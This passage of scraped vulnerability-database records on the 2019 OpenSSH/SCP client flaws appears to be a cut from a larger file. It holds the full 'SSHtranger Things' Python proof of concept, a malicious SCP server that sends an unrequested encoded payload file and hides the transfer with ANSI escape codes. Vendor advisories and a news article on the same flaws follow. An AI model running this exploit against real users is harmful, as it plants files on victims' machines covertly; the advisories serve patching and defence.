channel.close()\n\ndef main():\n logging.info('Creating a temporary RSA host key...')\n host_key = paramiko.rsakey.RSAKey.generate(1024)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('localhost', 2222))\n sock.listen(0)\n logging.info('Listening on port 2222...')\n\n while True:\n client, addr = sock.accept()\n logging.info('Received connection from %s:%s', *addr)\n transport = paramiko.Transport(client)\n transport.add_server_key(host_key)\n server = ScpServer()\n transport.start_server(server=server)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:46", "description": "\nSCP Client - Multiple Vulnerabilities (SSHtranger Things)", "edition": 1, "published": "2019-01-18T00:00:00", "title": "SCP Client - Multiple Vulnerabilities (SSHtranger Things)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-18T00:00:00", "id": "EXPLOITPACK:98FE96309F9524B8C84C508837551A19", "href": "", "sourceData": "# Exploit Title: SSHtranger Things\n# Date: 2019-01-17\n# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>\n# Vendor Homepage: https://www.openssh.com/\n# Software Link: [download link if available]\n# Version: OpenSSH 7.6p1\n# Tested on: Ubuntu 18.04.1 LTS\n# CVE : CVE-2019-6111, CVE-2019-6110\n\n'''\nTitle: SSHtranger Things\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\nHomepage: https://www.hyperiongray.com\nDate: 2019-01-17\nCVE: CVE-2019-6111, CVE-2019-6110\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\n\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\npackage.\n\nThe server listens on port 2222. It accepts any username and password, and it\ngenerates a new host key every time you run it.\n\n $ python3 sshtranger_things.py\n\nDownload a file using a vulnerable client. The local path must be a dot:\n\n $ scp -P 2222 foo@localhost:test.txt .\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\n Are you sure you want to continue connecting (yes/no)? yes\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\n foo@localhost's password:\n test.txt 100% 32 0.7KB/s 00:00\n\nThe file you requested (e.g. test.txt) will be saved in your current directory.\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\ncreated in your current directory.\n\n $ cat test.txt\n This is the file you requested.\n $ cat exploit.txt\n SSHtranger Things\n\nThe interesting code is in ScpServer.send_file().\n'''\nimport base64\nimport gzip\nimport logging\nimport paramiko\nimport paramiko.rsakey\nimport socket\nimport threading\n\nlogging.basicConfig(level=logging.INFO)\n\ndummy = 'This is the file you requested.\\n'\npayload = gzip.decompress(base64.b64decode(\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\n))\n\nclass ScpServer(paramiko.ServerInterface):\n def __init__(self):\n self.event = threading.Event()\n\n def check_auth_password(self, username, password):\n logging.info('Authenticated with %s:%s', username, password)\n return paramiko.AUTH_SUCCESSFUL\n\n def check_channel_request(self, kind, chanid):\n logging.info('Opened session channel %d', chanid)\n if kind == \"session\":\n return paramiko.OPEN_SUCCEEDED\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\n\n def check_channel_exec_request(self, channel, command):\n command = command.decode('ascii')\n logging.info('Approving exec request: %s', command)\n parts = command.split(' ')\n # Make sure that this is a request to get a file:\n assert parts[0] == 'scp'\n assert '-f' in parts\n file = parts[-1]\n # Send file from a new thread.\n threading.Thread(target=self.send_file, args=(channel, file)).start()\n return True\n\n def send_file(self, channel, file):\n '''\n The meat of the exploit:\n 1. Send the requested file.\n 2. Send another file (exploit.txt) that was not requested.\n 3. Print ANSI escape sequences to stderr to hide the transfer of\n exploit.txt.\n '''\n def wait_ok():\n assert channel.recv(1024) == b'\\x00'\n def send_ok():\n channel.sendall(b'\\x00')\n\n wait_ok()\n\n logging.info('Sending requested file \"%s\" to channel %d', file,\n channel.get_id())\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(dummy)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6111: whatever file the client requested, we send\n # them 'exploit.txt' instead.\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\n channel.get_id())\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(payload)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6110: the client will display the text that we send\n # to stderr, even if it contains ANSI escape sequences. We can send\n # ANSI codes that clear the current line to hide the fact that a second\n # file was transmitted..\n logging.info('Covering our tracks by sending ANSI escape sequence')\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\n channel.close()\n\ndef main():\n logging.info('Creating a temporary RSA host key...')\n host_key = paramiko.rsakey.RSAKey.generate(1024)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('localhost', 2222))\n sock.listen(0)\n logging.info('Listening on port 2222...')\n\n while True:\n client, addr = sock.accept()\n logging.info('Received connection from %s:%s', *addr)\n transport = paramiko.Transport(client)\n transport.add_server_key(host_key)\n server = ScpServer()\n transport.start_server(server=server)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2019-01-28T18:05:10", "bulletinFamily": "unix", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "This update for openssh fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. by inserting ANSI\n escape sequences (bsc#1121818)\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-01-28T15:09:07", "published": "2019-01-28T15:09:07", "id": "OPENSUSE-SU-2019:0091-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-01/msg00036.html", "title": "Security update for openssh (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-01-29T18:05:10", "bulletinFamily": "unix", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "This update for openssh fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. by inserting ANSI\n escape sequences (bsc#1121818)\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2019-01-29T15:13:14", "published": "2019-01-29T15:13:14", "id": "OPENSUSE-SU-2019:0093-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-01/msg00041.html", "title": "Security update for openssh (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2019-03-20T18:05:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could overwrite arbitrary files, transfer malicious files, or gain unauthorized access. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.9_p1-r4\"", "edition": 1, "modified": "2019-03-20T00:00:00", "published": "2019-03-20T00:00:00", "id": "GLSA-201903-16", "href": "https://security.gentoo.org/glsa/201903-16", "title": "OpenSSH: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2019-01-15T12:41:21", "bulletinFamily": "info", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "[](<https://1.bp.blogspot.com/-bcbhxIJD0bs/XD3RhB3znUI/AAAAAAAAzA4/tu8YcDuMJ_UcKm2U_QA4qos0wKbvNN5zQCLcBGAs/s728-e100/scp-vulnerabilities.png>)\n\nA set of 36-year-old vulnerabilities has been uncovered in the Secure Copy Protocol (SCP) implementation of many client applications that can be exploited by malicious servers to overwrite arbitrary files in the SCP client target directory unauthorizedly. \n \nSession Control Protocol (SCP), also known as secure copy, is a network protocol that allows users to securely transfer files between a local host and a remote host using RCP (Remote Copy Protocol) and SSH protocol. \n \nIn other terms, SCP, which dates back to 1983, is a secure version of RCP that uses authentication and encryption of SSH protocol to transfer files between a server and a client. \n\n\n \nDiscovered by Harry Sintonen, one of F-Secure's Senior Security Consultants, the vulnerabilities exist due to poor validations performed by the SCP clients, which can be abused by malicious servers or man-in-the-middle (MiTM) attackers to drop or overwrite arbitrary files on the client's system. \n\n\n> \"Many scp clients fail to verify if the objects returned by the scp server match those it asked for. This issue dates back to 1983 and rcp, on which scp is based. A separate flaw in the client allows the target directory attributes to be changed arbitrarily. Finally, two vulnerabilities in clients may allow server to spoof the client output,\" Sintonen explained.\n\nIn a specific attack scenario, an attacker-controlled server can drop .bash_aliases file to the victim's home directory, which will trick the system into executing malicious commands within it as soon as the Linux user launches a new shell. \n \nAs explained by the researcher, \"the transfer of extra files is hidden by sending ANSI control sequences via stderr.\" \n\n\n## Multiple SCP Client Vulnerabilities\n\n \nAccording to the [advisory](<https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt>), the following-mentioned vulnerabilities were discovered in August last year, which were then responsibly reported to developers of vulnerable clients, including OpenSSH, PuTTY, and WinSCP. \n \n\n\n 1. **SCP client improper directory name validation (CVE-2018-20685)\u2014**a vulnerable scp client could allow a remote SCP server to modify permissions of the target directory by using empty ('D0777 0 \\n') or dot ('D0777 0 .\\n') directory name.\n 2. **SCP client missing received object name validation (CVE-2019-6111)\u2014**This vulnerability could allow a malicious SCP server to overwrite arbitrary files in the SCP client target directory. If a recursive operation (-r) is performed, the server can manipulate sub-directories as well (for example overwrite .ssh/authorized_keys).\"\n 3. **SCP client spoofing via object name (CVE-2019-6109)\u2014**Due to missing character encoding in the progress display, the client output can be manipulated using ANSI code to hide additional files being transferred.\n 4. **SCP client spoofing via stderr (CVE-2019-6110)\u2014**This issue is also similar to the above one, allowing a malicious server to manipulate the client output.\n \nSince the vulnerabilities impact the implementation of the SCP protocol, all SCP client applications, including OpenSSH, PuTTY, and WinSCP, which uses SCP as a standard to transfer files are affected. \n \nWinSCP addressed the issues with the release of [version 5.14](<https://winscp.net/tracker/1675>) last October, and the patch is also included in the current version 5.14.4. \n\n\n[](<https://1.bp.blogspot.com/-23dWzIIeOOw/XD3GDEgmw6I/AAAAAAAAzAs/ASeQkO3YiPU8krLtALkDvMo6d9vyKAY1gCLcBGAs/s728-e100/scp-vulnerabilities.png>)\n\nCVE-2018-20685 was [patched](<https://github.com/openssh/openssh-portable/commit/6010c0303a422a9c5fa8860c061bf7105eb7f8b2>) in OpenSSH's implementation of the SCP protocol in November, though the fix has not been formally released by the vendor yet. The rest three vulnerabilities remain unpatched in [version 7.9](<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html>), the latest version released in October. \n\n\n \nHowever, if you are worried of malicious SCP server pwning you, you can configure your systems to use SFTP (Secure FTP) if possible. \n \nAlternatively, Sintonen has also provided a fix to harden SCP against most server-side manipulation attempts, which you can apply directly, though it may cause some problems. \n \nIt seems like PuTTY has not fixed the vulnerabilities yet, since the last PuTTY release was version 0.7 in July 2017. \n \nUsers who think the vulnerabilities might impact them are recommended to keep an eye on the patches and apply them as soon as they become available for your client applications. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-01-15T12:32:02", "published": "2019-01-15T12:32:00", "id": "THN:445A5A09D3930F981A45FE5AFA1E4CEC", "href": "https://thehackernews.com/2019/01/scp-software-vulnerabilities.html", "type": "thn", "title": "36-Year-Old SCP Clients' Implementation Flaws Discovered", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2020-04-06T22:39:40", "bulletinFamily": "software", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2019-01-18T00:14:00", "published": "2019-01-18T00:14:00", "id": "F5:K31781390", "href": "https://support.f5.com/csp/article/K31781390", "title": "January 2019 OpenSSH security vulnerabilities", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "symantec": [{"lastseen": "2021-02-18T20:47:33", "bulletinFamily": "software", "cvelist": ["CVE-2018-20685", "CVE-2019-15609", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "**Summary**\n\nSymantec SWG products using affected versions of OpenSSH are susceptible to multiple vulnerabilities. A malicious SCP server or SCP man-in-the-middle (MITM) attacker can modify state on the SCP client host. A local attacker can cause denial of service through OpenSSH application crashes. \n** **\n\n**Affected Product(s)**\n\n**Director** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6110, CVE-2019-6111 \n \n| 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6110, CVE-2019-6111 | 2.3, 2.4 | Upgrade to a later release with fixes. \n3.0 | Not available at this time \n3.1 and later | Not vulnerable, fixed in 3.1.1.1 \n \n \n\n**Security Analytics (SA)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2019-6110 | 7.2 and later | A fix will not be provided because no suitable fix is available for the upstream OpenSSH library. \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6111 | 7.2 | Not available at this time \n7.3, 8.0 | Upgrade to a later release with fixes. \n8.1 | Upgrade to 8.1.3 \n8.2 and later | Not vulnerable, fixed in 8.2.1. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6110, CVE-2019-6111 | 10.0, 11.0 | A fix will not be provided. \n \n \n\n**Additional Product Information**\n\nThe following products are not vulnerable: \n**Advanced Secure Gateway (ASG)** \n**AuthConnector** \n**BCAAA** \n**Content Analysis (CA)** \n**General Auth Connector Login Application** \n**HSM Agent for the Luna SP** \n**Mail Threat Defense (MTD)** \n**ProxySG** \n**Reporter** \n**Security Analytics (SA)** \n**SSL Visibility (SSLV)** \n**Unified Agent** \n**Web Isolation (WI)** \n**WSS Agent** \n**WSS Mobile Agent**\n\nThe following products are under investigation: \n**CacheFlow (CF) \nSymantec Messaging Gateway (SMG) \n \n**\n\n**Issue Details**\n\n**CVE-2018-20685** \n--- \n**Severity / CVSS v3.0:** | Medium / 5.3 (AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N) \n**References:** | NVD: [CVE-2018-20685](<https://nvd.nist.gov/vuln/detail/CVE-2018-20685> \"NVD - CVE-2018-20685\" ) \n**Impact:** | Unauthorized modification \n**Description:** | A flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send a crafted response and modify permissions of the target client directory. \n \n \n\n**CVE-2019-6109** \n--- \n**Severity / CVSS v3.0:** | Medium / 6.8 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N) \n**References:** | NVD: [CVE-2019-6109](<https://nvd.nist.gov/vuln/detail/CVE-2019-6109> \"NVD - CVE-2019-6109\" ) \n**Impact:** | Unauthorized modification \n**Description:** | A flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send crafted objects and modify the SCP client output, such as hide additional files being transferred. \n \n \n\n**CVE-2019-6110** \n--- \n**Severity / CVSS v3.0:** | Medium / 6.8 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N) \n**References:** | NVD: [CVE-2019-6110](<https://nvd.nist.gov/vuln/detail/CVE-2019-6110> \"NVD - CVE-2019-6110\" ) \n**Impact:** | Unauthorized modification \n**Description:** | A flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send crafted error message and modify the SCP client output, such as hide additional files being transferred. \n \n \n\n**CVE-2019-6111** \n--- \n**Severity / CVSS v3.0:** | Medium / 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N) \n**References:** | NVD: [CVE-2019-6111](<https://nvd.nist.gov/vuln/detail/CVE-2019-6111> \"NVD - CVE-2019-6111\" ) \n**Impact:** | Unauthorized modification \n**Description:** | An insufficient validation flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send files with crafted names and overwrite arbitrary files in the target client directory or in subdirectories. \n \n \n\n**CVE-2019-15609** \n--- \n**Severity / CVSS v3.0:** | High / 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2019-15609](<https://nvd.nist.gov/vuln/detail/CVE-2019-15609> \"NVD - CVE-2019-15609\" ) \n**Impact:** | Denial of service \n**Description:** | A flaw in local XMLSS private key processing allows a local attacker to configure OpenSSH with a crafted XMSS private key and cause denial of service through an OpenSSH application crash. \n \n \n\n**Mitigation &amp; Additional Information**\n\nBy default, X-Series XOS does not use OpenSSH as an SCP client. Customers who leave this behavior unchanged prevent attacks against XOS. \n \n\n\n**Revisions**\n\n2021-02-18 A fix for MC 2.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-12-09 A fix for CVE-2018-20685, CVE-2019-6109, and CVE-2019-6111 in SA 8.1 is available in 8.1.3. A fix for CVE-2019-6110 in SA will not be provided. SA 8.2 is not vulnerable because a fix is available in 8.2.1. \n2020-11-30 MC 3.1 is not vulnerable because a fix is available in 3.1.1.1. \n2020-11-19 A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. \n2020-08-19 A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-04-21 initial public release\n", "modified": "2021-02-18T19:05:17", "published": "2020-04-21T20:41:25", "id": "SMNTC-1756", "href": "", "type": "symantec", "title": "OpenSSH Vulnerabilities Jan-Oct 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "aix": [{"lastseen": "2019-07-16T23:56:35", "bulletinFamily": "unix", "cvelist": ["CVE-2018-6110", "CVE-2018-20685", "CVE-2018-6109", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111", "CVE-2018-6111"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue Jul 16 09:38:57 CDT 2019\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2018-20685\n CVE-2018-6109 CVE-2018-6110 CVE-2018-6111)\n\n\n===============================================================================\n\nSUMMARY:\n\n Vulnerabilities in OpenSSH affect AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2019-6109\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6109\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6109\n DESCRIPTION: OpenSSH could allow a remote attacker to conduct spoofing \n attacks, caused by missing character encoding in the progress display.\n A man-in-the-middle attacker could exploit this vulnerability to spoof\n scp client output.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155488 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n CVEID: CVE-2019-6110\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6110\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6110\n DESCRIPTION: OpenSSH could allow a remote attacker to conduct spoofing \n attacks, caused by accepting and displaying arbitrary stderr output \n from the scp server. A man-in-the-middle attacker could exploit this \n vulnerability to spoof scp client output.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155487 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n CVEID: CVE-2019-6111\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111\n DESCRIPTION: OpenSSH could allow a remote attacker to overwrite \n arbitrary files on the system, caused by missing received object \n name validation by the scp client. The scp implementation accepts \n arbitrary files sent by the server and a man-in-the-middle attacker \n could exploit this vulnerability to overwrite unrelated files.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155486 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n CVEID: CVE-2018-20685\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20685\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20685\n DESCRIPTION: In OpenSSH 7.9, scp.c in the scp client allows remote \n SSH servers to bypass intended access restrictions via the \n filename of . or an empty filename. The impact is modifying \n the permissions of the target directory on the client side.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155484 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n\n AFFECTED PRODUCTS AND VERSION:\n\n AIX 7.1, 7.2\n VIOS 2.2, 3.1\n\n The following fileset levels are vulnerable:\n\n key_fileset = osrcaix\n\n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 7.5.102.1600 key_w_fs\n openssh.base.server 4.0.0.5200 7.5.102.1600 key_w_fs\n\n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n\n REMEDIATION:\n\n FIXES\n\n A fix is available for CVE-2018-20685, CVE-2019-6109, and \n CVE-2019-6111, and it can be downloaded from:\n https://www-01.ibm.com/marketing/iwm/iwm/web/pickUrxNew.do?source=aixbp&S_PKG=openssh\n\n Please see the WORKAROUNDS AND MITIGATIONS section for mitigation\n steps in response to CVE-2019-6110.\n\n To extract the fixes from the tar file:\n\n For Openssh 7.5 version -\n zcat openssh-7.5.102.1800.tar.Z | tar xvf\n\n Please refer to the Readme file to be aware of the changes that\n are part of the release.\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n Note that all the previously reported security vulnerability fixes\n are also included in above mentioned fileset level. Please refer\n to the readme file (provided along with the fileset) for the\n complete list of vulnerabilities fixed.\n\n To preview the fix installation:\n\n installp -apYd . openssh\n\n To install the fix package:\n\n installp -aXYd . openssh\n\n\n Published advisory OpenSSH signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc.sig\n\n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n\n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n\n WORKAROUNDS AND MITIGATIONS:\n\n The potential impact of CVE-2019-6110 may be mitigated by using the\n sftp command in place of the scp command.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\nftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Complete CVSS v3 Guide:\n http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerabilities in OpenSSH affect AIX \n https://www-01.ibm.com/support/docview.wss?uid=ibm10872060\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Tue Jul 16 09:38:57 CDT 2019\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will\nultimately impact the Overall CVSS Score. Customers can evaluate the\nimpact of this vulnerability in their environments by accessing the links\nin the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams\n(FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\nopen standard designed to convey vulnerability severity and help to\ndetermine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES 